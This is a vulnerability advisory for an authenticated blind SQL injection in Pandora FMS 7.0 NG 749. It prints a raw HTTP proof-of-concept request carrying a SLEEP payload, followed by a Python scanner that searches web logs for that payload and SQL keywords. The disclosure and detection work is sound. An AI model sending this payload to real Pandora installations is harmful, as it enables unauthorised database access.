Vendor: Pandora FMS
By: Matthew Aberegg, Alex Prieto
CVSS: 8.8 (HIGH)
SQL Injection
CWE: 89
Product Name: Pandora FMS
Affected Version From: Pandora FMS 7.0 NG 749
Affected Version To: Pandora FMS 7.0 NG 749
Patch Exists: YES
Related CWE: N/A
CPE: a:pandorafms:pandora_fms:7.0_ng_749
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Ubuntu 18.04
2020

Pandora FMS 7.0 NG 749 – ‘CG Items’ SQL Injection (Authenticated)

A blind SQL injection vulnerability exists in the 'CG Items' functionality of Pandora FMS. The vulnerable parameter is 'data'.

Mitigation:

The vendor has released a patch to address this vulnerability.

Exploit-DB raw data:

# Exploit Title: Pandora FMS 7.0 NG 749 - 'CG Items' SQL Injection (Authenticated)
# Date: 11-14-2020
# Exploit Author: Matthew Aberegg, Alex Prieto
# Vendor Homepage: https://pandorafms.com/
# Patch Link: https://github.com/pandorafms/pandorafms/commit/1258a1a63535f60924fb69b1f7812c678570cc8e
# Software Link: https://pandorafms.com/community/get-started/
# Version: Pandora FMS 7.0 NG 749
# Tested on: Ubuntu 18.04


# Vulnerability Details
# Description : A blind SQL injection vulnerability exists in the "CG Items" functionality of Pandora FMS.  
# Vulnerable Parameter : data


# POC

POST /pandora_console/ajax.php?data=(SELECT+1+FROM+(SELECT(SLEEP(5)))A) HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 23
Origin: http://TARGET
Connection: close
Referer: http://TARGET/pandora_console/index.php?sec=eventos&sec2=operation/events/events
Cookie: PHPSESSID=i5uv0ugb4bdu9avagk38vcdok3

page=general%2Fcg_items
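
A detection sketch for the request shape in the POC above, added here as an example and not taken from the advisory or from Pandora FMS. It scans web access logs for `ajax.php` requests whose `data` query parameter carries SQL keywords and notes whether the response was slow. The log layout (combined format with a trailing request time in seconds), the keyword list and the 4-second threshold are assumptions, and the sample lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines: combined log format plus request time in seconds (assumed layout).
SAMPLE_LOG = [
    '192.0.2.10 - - [14/Nov/2020:10:00:01 +0000] "POST /pandora_console/ajax.php HTTP/1.1" 200 512 "-" "Mozilla/5.0" 0.041',
    '192.0.2.10 - - [14/Nov/2020:10:00:09 +0000] "POST /pandora_console/ajax.php?data=(SELECT+1+FROM+(SELECT(SLEEP(5)))A) HTTP/1.1" 200 0 "-" "Mozilla/5.0" 5.012',
    '198.51.100.7 - - [14/Nov/2020:10:02:30 +0000] "POST /pandora_console/ajax.php?data=%28select%20sleep%282%29%29 HTTP/1.1" 200 0 "-" "curl/7.68.0" 2.006',
    '198.51.100.7 - - [14/Nov/2020:10:03:00 +0000] "GET /docs/search?q=select+a+plan HTTP/1.1" 200 900 "-" "curl/7.68.0" 0.020',
]

LINE_RE = re.compile(
    r'^(?P<client>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) .* (?P<secs>\d+\.\d+)$'
)
# Assumption: legitimate `data` values never contain these SQL keywords.
SQL_TOKENS = re.compile(r"\b(?:select|union|sleep|benchmark)\b", re.IGNORECASE)


def scan(lines, slow_seconds=4.0):
    """Return one finding per ajax.php request whose `data` parameter carries SQL keywords."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not in the assumed log format
        url = urlsplit(m.group("target"))
        if not url.path.endswith("/ajax.php"):
            continue
        # parse_qs URL-decodes, so '+' and %28-style encodings are normalised first.
        for value in parse_qs(url.query).get("data", []):
            tokens = sorted({t.lower() for t in SQL_TOKENS.findall(value)})
            if tokens:
                findings.append({
                    "client": m.group("client"),
                    "tokens": tokens,
                    # A long response time matches the time-based (SLEEP) blind technique.
                    "slow": float(m.group("secs")) >= slow_seconds,
                })
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Because the POC carries `data` in the query string rather than the POST body, the value is visible in ordinary access logs without body capture.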